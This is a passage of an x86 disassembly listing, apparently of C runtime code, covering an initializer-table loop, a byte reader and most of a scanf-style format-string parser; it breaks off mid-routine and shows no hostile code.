sub_42321D proc near ; CODE XREF: sub_41F146+40�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_42319B
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_42321D endp
; ---------------------------------------------------------------------------
byte_42322F db 68h ; DATA XREF: seg002:0043C020�o
dd 80h, 0FFB39AE8h, 59C085FFh, 4E3F2CA3h, 6A047500h, 83C35818h
dd 2CA10020h, 0A3004E3Fh, 4E3F28h
db 33h, 0C0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_423257 proc near ; CODE XREF: start:loc_420E00�p
push 0Ch
push offset dword_439A68
call sub_425F14
mov dword ptr [ebp-1Ch], offset dword_43A5BC
loc_42326A: ; CODE XREF: sub_423257+3C�j
cmp dword ptr [ebp-1Ch], offset dword_43A5BC
jnb short loc_423295
and dword ptr [ebp-4], 0
mov eax, [ebp-1Ch]
mov eax, [eax]
test eax, eax
jz short loc_42328B
call eax
jmp short loc_42328B
; ---------------------------------------------------------------------------
dd 0C340C033h
db 8Bh, 65h, 0E8h
; ---------------------------------------------------------------------------
loc_42328B: ; CODE XREF: sub_423257+27�j
; sub_423257+2B�j
or dword ptr [ebp-4], 0FFFFFFFFh
add dword ptr [ebp-1Ch], 4
jmp short loc_42326A
; ---------------------------------------------------------------------------
loc_423295: ; CODE XREF: sub_423257+1A�j
call sub_425F4F
retn
sub_423257 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
byte_42329B db 6Ah ; DATA XREF: sub_41F146:loc_41F181�o
dd 9A78680Ch, 6DE80043h, 0C700002Ch, 0A5C4E445h, 7D810043h
dd 43A5C4E4h, 83227300h, 8B00FC65h, 8BE445h, 0B74C085h
dd 7EBD0FFh, 0C340C033h, 83E8658Bh, 83FFFC4Dh, 0EB04E445h
dd 2C71E8D5h
db 2 dup(0), 0C3h
; =============== S U B R O U T I N E =======================================
sub_4232DF proc near ; CODE XREF: sub_423327+B43�p
; sub_423327+C8A�p
cmp ds:dword_4437B0, 1
push esi
mov esi, eax
jle short loc_4232F7
push 4
push esi
call sub_422B91
pop ecx
pop ecx
jmp short loc_423303
; ---------------------------------------------------------------------------
loc_4232F7: ; CODE XREF: sub_4232DF+A�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+esi*2]
and eax, 4
loc_423303: ; CODE XREF: sub_4232DF+16�j
test eax, eax
jnz short loc_42330D
and esi, 0FFFFFFDFh
sub esi, 7
loc_42330D: ; CODE XREF: sub_4232DF+26�j
mov eax, esi
pop esi
retn
sub_4232DF endp
; =============== S U B R O U T I N E =======================================
sub_423311 proc near ; CODE XREF: sub_423327+8A�p
; sub_423327+2AD�p ...
dec dword ptr [edx+4]
js short loc_42331F
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_42331F: ; CODE XREF: sub_423311+3�j
push edx
call sub_421C63
pop ecx
retn
sub_423311 endp
; =============== S U B R O U T I N E =======================================
sub_423327 proc near ; CODE XREF: sub_41F73D+2A�p
push 1CCh
push offset dword_439A88
call sub_425F14
mov eax, ds:dword_4437D4
mov [ebp-1Ch], eax
xor eax, eax
mov [ebp-1BCh], eax
mov [ebp-1D8h], eax
mov [ebp-1B0h], eax
mov [ebp-194h], eax
mov [ebp-195h], al
mov [ebp-184h], eax
mov [ebp-1B8h], eax
loc_42336A: ; CODE XREF: sub_423327+C0�j
; sub_423327+E1A�j
mov esi, [ebp+0Ch]
loc_42336D: ; CODE XREF: sub_423327+E08�j
mov al, [esi]
test al, al
jz loc_424147
movzx eax, al
cmp ds:dword_4437B0, 1
jle short loc_42338F
push 8
push eax
call sub_422B91
pop ecx
pop ecx
jmp short loc_42339C
; ---------------------------------------------------------------------------
loc_42338F: ; CODE XREF: sub_423327+5A�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_42339C: ; CODE XREF: sub_423327+66�j
xor edi, edi
cmp eax, edi
jz short loc_4233E9
dec dword ptr [ebp-184h]
loc_4233A8: ; CODE XREF: sub_423327+9A�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov esi, eax
push esi
call sub_420AFE
pop ecx
test eax, eax
jnz short loc_4233A8
cmp esi, 0FFFFFFFFh
jz short loc_4233D3
push dword ptr [ebp+8]
push esi
call sub_427140
pop ecx
pop ecx
loc_4233D3: ; CODE XREF: sub_423327+9F�j
; sub_423327+BE�j
inc dword ptr [ebp+0Ch]
mov eax, [ebp+0Ch]
movzx eax, byte ptr [eax]
push eax
call sub_420AFE
pop ecx
test eax, eax
jnz short loc_4233D3
jmp short loc_42336A
; ---------------------------------------------------------------------------
loc_4233E9: ; CODE XREF: sub_423327+79�j
mov esi, [ebp+0Ch]
cmp byte ptr [esi], 25h
jnz loc_4240B1
mov [ebp-1A0h], edi
mov byte ptr [ebp-198h], 0
mov [ebp-19Ch], edi
mov [ebp-1B4h], edi
mov [ebp-18Ch], edi
mov byte ptr [ebp-1A1h], 0
mov byte ptr [ebp-197h], 0
mov byte ptr [ebp-18Eh], 0
mov byte ptr [ebp-17Dh], 0
mov byte ptr [ebp-196h], 0
mov byte ptr [ebp-185h], 0
mov byte ptr [ebp-18Dh], 1
mov [ebp-1C8h], edi
loc_42344B: ; CODE XREF: sub_423327+229�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
cmp ds:dword_4437B0, 1
jle short loc_423467
push 4
push eax
call sub_422B91
pop ecx
pop ecx
jmp short loc_423474
; ---------------------------------------------------------------------------
loc_423467: ; CODE XREF: sub_423327+132�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_423474: ; CODE XREF: sub_423327+13E�j
test eax, eax
jz short loc_42348A
inc dword ptr [ebp-1B4h]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_423549
; ---------------------------------------------------------------------------
loc_42348A: ; CODE XREF: sub_423327+14F�j
cmp ebx, 4Eh
jg loc_423518
jz loc_423549
cmp ebx, 2Ah
jz short loc_423510
cmp ebx, 46h
jz loc_423549
cmp ebx, 49h
jz short loc_4234BC
cmp ebx, 4Ch
jnz short loc_423527
inc byte ptr [ebp-18Dh]
jmp loc_423549
; ---------------------------------------------------------------------------
loc_4234BC: ; CODE XREF: sub_423327+183�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_4234E4
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_4234E4
mov esi, eax
inc dword ptr [ebp-1C8h]
and dword ptr [ebp-1ACh], 0
and dword ptr [ebp-1A8h], 0
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_4234E4: ; CODE XREF: sub_423327+19B�j
; sub_423327+1A3�j
cmp cl, 33h
jnz short loc_4234F5
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_4234F5
mov esi, eax
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_4234F5: ; CODE XREF: sub_423327+1C0�j
; sub_423327+1C8�j
cmp cl, 64h
jz short loc_423549
cmp cl, 69h
jz short loc_423549
cmp cl, 6Fh
jz short loc_423549
cmp cl, 78h
jz short loc_423549
cmp cl, 58h
jnz short loc_423527
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_423510: ; CODE XREF: sub_423327+175�j
inc byte ptr [ebp-18Eh]
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_423518: ; CODE XREF: sub_423327+166�j
cmp ebx, 68h
jz short loc_42353D
cmp ebx, 6Ch
jz short loc_42352F
cmp ebx, 77h
jz short loc_423535
loc_423527: ; CODE XREF: sub_423327+188�j
; sub_423327+1E5�j
inc byte ptr [ebp-17Dh]
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_42352F: ; CODE XREF: sub_423327+1F9�j
inc byte ptr [ebp-18Dh]
loc_423535: ; CODE XREF: sub_423327+1FE�j
inc byte ptr [ebp-185h]
jmp short loc_423549
; ---------------------------------------------------------------------------
loc_42353D: ; CODE XREF: sub_423327+1F4�j
dec byte ptr [ebp-18Dh]
dec byte ptr [ebp-185h]
loc_423549: ; CODE XREF: sub_423327+15E�j
; sub_423327+16C�j ...
cmp byte ptr [ebp-17Dh], 0
jz loc_42344B
mov [ebp-18Ch], edi
mov [ebp+0Ch], esi
cmp byte ptr [ebp-18Eh], 0
jnz short loc_423582
mov eax, [ebp+10h]
mov [ebp-1DCh], eax
add eax, 4
mov [ebp+10h], eax
mov ebx, [eax-4]
mov [ebp-1B0h], ebx
jmp short loc_423588
; ---------------------------------------------------------------------------
loc_423582: ; CODE XREF: sub_423327+23F�j
mov ebx, [ebp-1B0h]
loc_423588: ; CODE XREF: sub_423327+259�j
mov byte ptr [ebp-17Dh], 0
cmp byte ptr [ebp-185h], 0
jnz short loc_4235B0
mov al, [esi]
cmp al, 53h
jz short loc_4235A9
cmp al, 43h
mov byte ptr [ebp-185h], 0FFh
jnz short loc_4235B0
loc_4235A9: ; CODE XREF: sub_423327+275�j
mov byte ptr [ebp-185h], 1
loc_4235B0: ; CODE XREF: sub_423327+26F�j
; sub_423327+280�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp-1C0h], edi
cmp edi, 6Eh
jz short loc_423605
cmp edi, 63h
jz short loc_4235F1
cmp edi, 7Bh
jz short loc_4235F1
loc_4235CB: ; CODE XREF: sub_423327+2BD�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov esi, eax
push esi
call sub_420AFE
pop ecx
test eax, eax
jnz short loc_4235CB
mov [ebp-194h], esi
mov esi, [ebp+0Ch]
jmp short loc_423605
; ---------------------------------------------------------------------------
loc_4235F1: ; CODE XREF: sub_423327+29D�j
; sub_423327+2A2�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov [ebp-194h], eax
loc_423605: ; CODE XREF: sub_423327+298�j
; sub_423327+2C8�j
mov ecx, [ebp-1B4h]
test ecx, ecx
jz short loc_42361C
cmp dword ptr [ebp-18Ch], 0
jz loc_423948
loc_42361C: ; CODE XREF: sub_423327+2E6�j
cmp edi, 6Fh
jg loc_423917
jz loc_423D3A
cmp edi, 63h
jz loc_4238EA
cmp edi, 64h
jz loc_423D3A
jle loc_42393D
cmp edi, 67h
jle short loc_42368C
cmp edi, 69h
jz short loc_42366E
cmp edi, 6Eh
jnz loc_42393D
mov eax, [ebp-184h]
cmp byte ptr [ebp-18Eh], 0
jz loc_424077
jmp loc_4240A3
; ---------------------------------------------------------------------------
loc_42366E: ; CODE XREF: sub_423327+324�j
push 64h
pop edi
loc_423671: ; CODE XREF: sub_423327+60B�j
mov ebx, [ebp-194h]
cmp ebx, 2Dh
jnz loc_423BE3
mov byte ptr [ebp-197h], 1
jmp loc_423BE8
; ---------------------------------------------------------------------------
loc_42368C: ; CODE XREF: sub_423327+31F�j
lea esi, [ebp-17Ch]
mov ebx, [ebp-194h]
cmp ebx, 2Dh
jnz short loc_4236AB
mov [ebp-17Ch], bl
lea esi, [ebp-17Bh]
jmp short loc_4236B0
; ---------------------------------------------------------------------------
loc_4236AB: ; CODE XREF: sub_423327+374�j
cmp ebx, 2Bh
jnz short loc_4236D0
loc_4236B0: ; CODE XREF: sub_423327+382�j
dec dword ptr [ebp-18Ch]
inc dword ptr [ebp-184h]
mov edi, [ebp+8]
mov edx, edi
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
jmp short loc_4236D3
; ---------------------------------------------------------------------------
loc_4236D0: ; CODE XREF: sub_423327+387�j
mov edi, [ebp+8]
loc_4236D3: ; CODE XREF: sub_423327+3A7�j
cmp dword ptr [ebp-1B4h], 0
jz short loc_4236E8
cmp dword ptr [ebp-18Ch], 15Dh
jle short loc_4236F2
loc_4236E8: ; CODE XREF: sub_423327+3B3�j
mov dword ptr [ebp-18Ch], 15Dh
loc_4236F2: ; CODE XREF: sub_423327+3BF�j
; sub_423327+41E�j
cmp ds:dword_4437B0, 1
jle short loc_423707
push 4
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_423713
; ---------------------------------------------------------------------------
loc_423707: ; CODE XREF: sub_423327+3D2�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_423713: ; CODE XREF: sub_423327+3DE�j
test eax, eax
jz short loc_423747
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jz short loc_423747
inc dword ptr [ebp-19Ch]
mov [esi], bl
inc esi
inc dword ptr [ebp-184h]
mov edx, edi
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
jmp short loc_4236F2
; ---------------------------------------------------------------------------
loc_423747: ; CODE XREF: sub_423327+3EE�j
; sub_423327+3FE�j
cmp ds:byte_4437B4, bl
jnz short loc_4237CB
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jz short loc_4237CB
inc dword ptr [ebp-184h]
mov edx, edi
call sub_423311
mov ebx, eax
mov al, ds:byte_4437B4
mov [esi], al
inc esi
loc_423776: ; CODE XREF: sub_423327+4A2�j
mov [ebp-194h], ebx
cmp ds:dword_4437B0, 1
jle short loc_423791
push 4
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_42379D
; ---------------------------------------------------------------------------
loc_423791: ; CODE XREF: sub_423327+45C�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_42379D: ; CODE XREF: sub_423327+468�j
test eax, eax
jz short loc_4237CB
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jz short loc_4237CB
inc dword ptr [ebp-19Ch]
mov [esi], bl
inc esi
inc dword ptr [ebp-184h]
mov edx, edi
call sub_423311
mov ebx, eax
jmp short loc_423776
; ---------------------------------------------------------------------------
loc_4237CB: ; CODE XREF: sub_423327+426�j
; sub_423327+436�j ...
cmp dword ptr [ebp-19Ch], 0
jz loc_42388F
cmp ebx, 65h
jz short loc_4237E6
cmp ebx, 45h
jnz loc_42388F
loc_4237E6: ; CODE XREF: sub_423327+4B4�j
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jz loc_42388F
mov byte ptr [esi], 65h
inc esi
inc dword ptr [ebp-184h]
mov edx, edi
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
cmp ebx, 2Dh
jnz short loc_42381D
mov [esi], al
inc esi
jmp short loc_423822
; ---------------------------------------------------------------------------
loc_42381D: ; CODE XREF: sub_423327+4EF�j
cmp ebx, 2Bh
jnz short loc_42384F
loc_423822: ; CODE XREF: sub_423327+4F4�j
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jnz short loc_42383A
and [ebp-18Ch], eax
jmp short loc_42384F
; ---------------------------------------------------------------------------
loc_42383A: ; CODE XREF: sub_423327+509�j
; sub_423327+566�j
mov edx, edi
inc dword ptr [ebp-184h]
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
loc_42384F: ; CODE XREF: sub_423327+4F9�j
; sub_423327+511�j
cmp ds:dword_4437B0, 1
jle short loc_423864
push 4
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_423870
; ---------------------------------------------------------------------------
loc_423864: ; CODE XREF: sub_423327+52F�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_423870: ; CODE XREF: sub_423327+53B�j
test eax, eax
jz short loc_42388F
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jz short loc_42388F
inc dword ptr [ebp-19Ch]
mov [esi], bl
inc esi
jmp short loc_42383A
; ---------------------------------------------------------------------------
loc_42388F: ; CODE XREF: sub_423327+4AB�j
; sub_423327+4B9�j ...
dec dword ptr [ebp-184h]
cmp ebx, 0FFFFFFFFh
jz short loc_4238A3
push edi
push ebx
call sub_427140
pop ecx
pop ecx
loc_4238A3: ; CODE XREF: sub_423327+571�j
cmp dword ptr [ebp-19Ch], 0
jz loc_424147
cmp byte ptr [ebp-18Eh], 0
jnz loc_4240A3
inc dword ptr [ebp-1B8h]
mov byte ptr [esi], 0
lea eax, [ebp-17Ch]
push eax
push dword ptr [ebp-1B0h]
movsx eax, byte ptr [ebp-18Dh]
dec eax
push eax
call ds:off_443A58
add esp, 0Ch
jmp loc_4240A3
; ---------------------------------------------------------------------------
loc_4238EA: ; CODE XREF: sub_423327+307�j
test ecx, ecx
jnz short loc_4238FE
mov dword ptr [ebp-1B4h], 1
inc dword ptr [ebp-18Ch]
loc_4238FE: ; CODE XREF: sub_423327+5C5�j
; sub_423327+5FE�j
cmp byte ptr [ebp-185h], 0
jle loc_423AC5
mov byte ptr [ebp-196h], 1
jmp loc_423AC5
; ---------------------------------------------------------------------------
loc_423917: ; CODE XREF: sub_423327+2F8�j
mov eax, edi
sub eax, 70h
jz loc_423D33
sub eax, 3
jz short loc_4238FE
dec eax
dec eax
jz loc_423D3A
sub eax, 3
jz loc_423671
sub eax, 3
jz short loc_423975
loc_42393D: ; CODE XREF: sub_423327+316�j
; sub_423327+329�j
movzx eax, byte ptr [esi]
cmp eax, [ebp-194h]
jz short loc_423954
loc_423948: ; CODE XREF: sub_423327+2EF�j
cmp dword ptr [ebp-194h], 0FFFFFFFFh
jmp loc_42410E
; ---------------------------------------------------------------------------
loc_423954: ; CODE XREF: sub_423327+61F�j
dec byte ptr [ebp-195h]
cmp byte ptr [ebp-18Eh], 0
jnz loc_4240A3
mov eax, [ebp-1DCh]
mov [ebp+10h], eax
jmp loc_4240A3
; ---------------------------------------------------------------------------
loc_423975: ; CODE XREF: sub_423327+614�j
cmp byte ptr [ebp-185h], 0
jle short loc_423985
mov byte ptr [ebp-196h], 1
loc_423985: ; CODE XREF: sub_423327+655�j
mov edi, [ebp+0Ch]
inc edi
mov [ebp+0Ch], edi
mov [ebp-1D0h], edi
cmp byte ptr [edi], 5Eh
jnz short loc_4239A5
inc edi
mov [ebp-1D0h], edi
mov byte ptr [ebp-1A1h], 0FFh
loc_4239A5: ; CODE XREF: sub_423327+66E�j
mov ebx, [ebp-1BCh]
test ebx, ebx
jnz short loc_423A0C
and [ebp-4], ebx
push 20h
pop eax
call sub_41EA20
mov [ebp-18h], esp
mov ebx, esp
mov [ebp-1BCh], ebx
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_423A0C
; ---------------------------------------------------------------------------
a3@Lessi db '3À@Ëeèè› ',0
dw 6A00h
dd 0ABF5E820h, 8959FFFFh, 0FFFE4485h, 75C085FFh, 0FC4D8309h
dd 755E9FFh, 85C70000h, 0FFFFFE28h, 1, 0FFFC4D83h, 0FE30BD8Bh
dd 9D8BFFFFh, 0FFFFFE44h
; ---------------------------------------------------------------------------
loc_423A0C: ; CODE XREF: sub_423327+686�j
; sub_423327+6A2�j
push 20h
push 0
push ebx
call sub_41E5F0
add esp, 0Ch
cmp dword ptr [ebp-1C0h], 7Bh
jnz short loc_423A99
cmp byte ptr [edi], 5Dh
jnz short loc_423A99
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_423A9F
; ---------------------------------------------------------------------------
loc_423A30: ; CODE XREF: sub_423327+77C�j
inc edi
cmp al, 2Dh
jnz short loc_423A80
test dl, dl
jz short loc_423A80
mov cl, [edi]
cmp cl, 5Dh
jz short loc_423A80
inc edi
cmp dl, cl
jnb short loc_423A49
mov al, cl
jmp short loc_423A4D
; ---------------------------------------------------------------------------
loc_423A49: ; CODE XREF: sub_423327+71C�j
mov al, dl
mov dl, cl
loc_423A4D: ; CODE XREF: sub_423327+720�j
cmp dl, al
ja short loc_423A7C
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp-1D4h], eax
loc_423A61: ; CODE XREF: sub_423327+753�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec dword ptr [ebp-1D4h]
jnz short loc_423A61
loc_423A7C: ; CODE XREF: sub_423327+728�j
xor dl, dl
jmp short loc_423A9F
; ---------------------------------------------------------------------------
loc_423A80: ; CODE XREF: sub_423327+70C�j
; sub_423327+710�j ...
mov [ebp-198h], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_423A99: ; CODE XREF: sub_423327+6F9�j
; sub_423327+6FE�j
mov dl, [ebp-198h]
loc_423A9F: ; CODE XREF: sub_423327+707�j
; sub_423327+757�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_423A30
test al, al
jz loc_424147
mov ebx, [ebp-1B0h]
cmp dword ptr [ebp-1C0h], 7Bh
jnz short loc_423ABF
mov [ebp+0Ch], edi
loc_423ABF: ; CODE XREF: sub_423327+793�j
mov edi, [ebp-1C0h]
loc_423AC5: ; CODE XREF: sub_423327+5DE�j
; sub_423327+5EB�j
mov esi, ebx
dec dword ptr [ebp-184h]
cmp dword ptr [ebp-194h], 0FFFFFFFFh
jz short loc_423AE6
push dword ptr [ebp+8]
push dword ptr [ebp-194h]
call sub_427140
pop ecx
pop ecx
loc_423AE6: ; CODE XREF: sub_423327+7AD�j
; sub_423327+9A3�j ...
cmp dword ptr [ebp-1B4h], 0
jz short loc_423B03
mov eax, [ebp-18Ch]
dec dword ptr [ebp-18Ch]
test eax, eax
jz loc_423CEB
loc_423B03: ; CODE XREF: sub_423327+7C6�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov [ebp-194h], eax
cmp eax, 0FFFFFFFFh
jz loc_423CD5
cmp edi, 63h
jz short loc_423B72
cmp edi, 73h
jnz short loc_423B39
cmp eax, 9
jl short loc_423B34
cmp eax, 0Dh
jle short loc_423B39
loc_423B34: ; CODE XREF: sub_423327+806�j
cmp eax, 20h
jnz short loc_423B72
loc_423B39: ; CODE XREF: sub_423327+801�j
; sub_423327+80B�j
cmp edi, 7Bh
jnz loc_423CD5
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp-1BCh]
movsx ecx, byte ptr [ecx+edi]
movsx edi, byte ptr [ebp-1A1h]
xor ecx, edi
test edx, ecx
jz loc_423CD5
mov edi, [ebp-1C0h]
loc_423B72: ; CODE XREF: sub_423327+7FC�j
; sub_423327+810�j
cmp byte ptr [ebp-18Eh], 0
jnz loc_423CCF
cmp byte ptr [ebp-196h], 0
jz loc_423CC1
mov [ebp-1C4h], al
movzx eax, al
mov ecx, ds:off_4437D8
test byte ptr [ecx+eax*2+1], 80h
jz short loc_423BB6
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov [ebp-1C3h], al
loc_423BB6: ; CODE XREF: sub_423327+879�j
push ds:dword_4437B0
lea eax, [ebp-1C4h]
push eax
lea eax, [ebp-1CCh]
push eax
call sub_4271AC
add esp, 0Ch
mov ax, [ebp-1CCh]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_423CC4
; ---------------------------------------------------------------------------
loc_423BE3: ; CODE XREF: sub_423327+353�j
cmp ebx, 2Bh
jnz short loc_423C13
loc_423BE8: ; CODE XREF: sub_423327+360�j
dec dword ptr [ebp-18Ch]
jnz short loc_423BFD
test ecx, ecx
jz short loc_423BFD
mov byte ptr [ebp-17Dh], 1
jmp short loc_423C13
; ---------------------------------------------------------------------------
loc_423BFD: ; CODE XREF: sub_423327+8C7�j
; sub_423327+8CB�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
loc_423C13: ; CODE XREF: sub_423327+8BF�j
; sub_423327+8D4�j
cmp ebx, 30h
jnz loc_423D7E
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
cmp bl, 78h
jz short loc_423C88
cmp bl, 58h
jz short loc_423C88
mov dword ptr [ebp-19Ch], 1
cmp edi, 78h
jz short loc_423C6A
cmp dword ptr [ebp-1B4h], 0
jz short loc_423C62
dec dword ptr [ebp-18Ch]
jnz short loc_423C62
inc byte ptr [ebp-17Dh]
loc_423C62: ; CODE XREF: sub_423327+92B�j
; sub_423327+933�j
push 6Fh
loc_423C64: ; CODE XREF: sub_423327+998�j
pop edi
jmp loc_423D7E
; ---------------------------------------------------------------------------
loc_423C6A: ; CODE XREF: sub_423327+922�j
dec dword ptr [ebp-184h]
cmp ebx, 0FFFFFFFFh
jz short loc_423C80
push dword ptr [ebp+8]
push ebx
call sub_427140
pop ecx
pop ecx
loc_423C80: ; CODE XREF: sub_423327+94C�j
push 30h
pop ebx
jmp loc_423D78
; ---------------------------------------------------------------------------
loc_423C88: ; CODE XREF: sub_423327+90E�j
; sub_423327+913�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
cmp dword ptr [ebp-1B4h], 0
jz short loc_423CBD
sub dword ptr [ebp-18Ch], 2
cmp dword ptr [ebp-18Ch], 1
jge short loc_423CBD
inc byte ptr [ebp-17Dh]
loc_423CBD: ; CODE XREF: sub_423327+97E�j
; sub_423327+98E�j
push 78h
jmp short loc_423C64
; ---------------------------------------------------------------------------
loc_423CC1: ; CODE XREF: sub_423327+85F�j
mov [ebx], al
inc ebx
loc_423CC4: ; CODE XREF: sub_423327+8B7�j
mov [ebp-1B0h], ebx
jmp loc_423AE6
; ---------------------------------------------------------------------------
loc_423CCF: ; CODE XREF: sub_423327+852�j
inc esi
jmp loc_423AE6
; ---------------------------------------------------------------------------
loc_423CD5: ; CODE XREF: sub_423327+7F3�j
; sub_423327+815�j ...
dec dword ptr [ebp-184h]
cmp eax, 0FFFFFFFFh
jz short loc_423CEB
push dword ptr [ebp+8]
push eax
call sub_427140
pop ecx
pop ecx
loc_423CEB: ; CODE XREF: sub_423327+7D6�j
; sub_423327+9B7�j
cmp esi, ebx
jz loc_424147
cmp byte ptr [ebp-18Eh], 0
jnz loc_4240A3
inc dword ptr [ebp-1B8h]
cmp dword ptr [ebp-1C0h], 63h
jz loc_4240A3
mov eax, [ebp-1B0h]
cmp byte ptr [ebp-196h], 0
jz short loc_423D2B
and word ptr [eax], 0
jmp loc_4240A3
; ---------------------------------------------------------------------------
loc_423D2B: ; CODE XREF: sub_423327+9F9�j
mov byte ptr [eax], 0
jmp loc_4240A3
; ---------------------------------------------------------------------------
loc_423D33: ; CODE XREF: sub_423327+5F5�j
mov byte ptr [ebp-18Dh], 1
loc_423D3A: ; CODE XREF: sub_423327+2FE�j
; sub_423327+310�j ...
mov ebx, [ebp-194h]
cmp ebx, 2Dh
jnz short loc_423D4E
mov byte ptr [ebp-197h], 1
jmp short loc_423D53
; ---------------------------------------------------------------------------
loc_423D4E: ; CODE XREF: sub_423327+A1C�j
cmp ebx, 2Bh
jnz short loc_423D7E
loc_423D53: ; CODE XREF: sub_423327+A25�j
dec dword ptr [ebp-18Ch]
jnz short loc_423D68
test ecx, ecx
jz short loc_423D68
mov byte ptr [ebp-17Dh], 1
jmp short loc_423D7E
; ---------------------------------------------------------------------------
loc_423D68: ; CODE XREF: sub_423327+A32�j
; sub_423327+A36�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
loc_423D78: ; CODE XREF: sub_423327+95C�j
mov [ebp-194h], ebx
loc_423D7E: ; CODE XREF: sub_423327+8EF�j
; sub_423327+93E�j ...
cmp dword ptr [ebp-1C8h], 0
jz loc_423F1E
cmp byte ptr [ebp-17Dh], 0
jnz loc_423EED
mov esi, 80h
loc_423D9D: ; CODE XREF: sub_423327+BBA�j
cmp edi, 78h
jz loc_423E26
cmp edi, 70h
jz short loc_423E26
cmp ds:dword_4437B0, 1
jle short loc_423DC0
push 4
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_423DCC
; ---------------------------------------------------------------------------
loc_423DC0: ; CODE XREF: sub_423327+A8B�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_423DCC: ; CODE XREF: sub_423327+A97�j
test eax, eax
jz loc_423E73
cmp edi, 6Fh
jnz short loc_423E03
cmp ebx, 38h
jge loc_423E73
mov eax, [ebp-1ACh]
mov ecx, [ebp-1A8h]
shld ecx, eax, 3
shl eax, 3
mov [ebp-1ACh], eax
mov [ebp-1A8h], ecx
jmp short loc_423E79
; ---------------------------------------------------------------------------
loc_423E03: ; CODE XREF: sub_423327+AB0�j
push 0
push 0Ah
push dword ptr [ebp-1A8h]
push dword ptr [ebp-1ACh]
call sub_420750
mov [ebp-1ACh], eax
mov [ebp-1A8h], edx
jmp short loc_423E79
; ---------------------------------------------------------------------------
loc_423E26: ; CODE XREF: sub_423327+A79�j
; sub_423327+A82�j
cmp ds:dword_4437B0, 1
jle short loc_423E3A
push esi
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_423E45
; ---------------------------------------------------------------------------
loc_423E3A: ; CODE XREF: sub_423327+B06�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, esi
loc_423E45: ; CODE XREF: sub_423327+B11�j
test eax, eax
jz short loc_423E73
mov eax, [ebp-1ACh]
mov ecx, [ebp-1A8h]
shld ecx, eax, 4
shl eax, 4
mov [ebp-1ACh], eax
mov [ebp-1A8h], ecx
mov eax, ebx
call sub_4232DF
mov ebx, eax
jmp short loc_423E79
; ---------------------------------------------------------------------------
loc_423E73: ; CODE XREF: sub_423327+AA7�j
; sub_423327+AB5�j ...
inc byte ptr [ebp-17Dh]
loc_423E79: ; CODE XREF: sub_423327+ADA�j
; sub_423327+AFD�j ...
cmp byte ptr [ebp-17Dh], 0
jnz short loc_423EC4
inc dword ptr [ebp-19Ch]
lea eax, [ebx-30h]
cdq
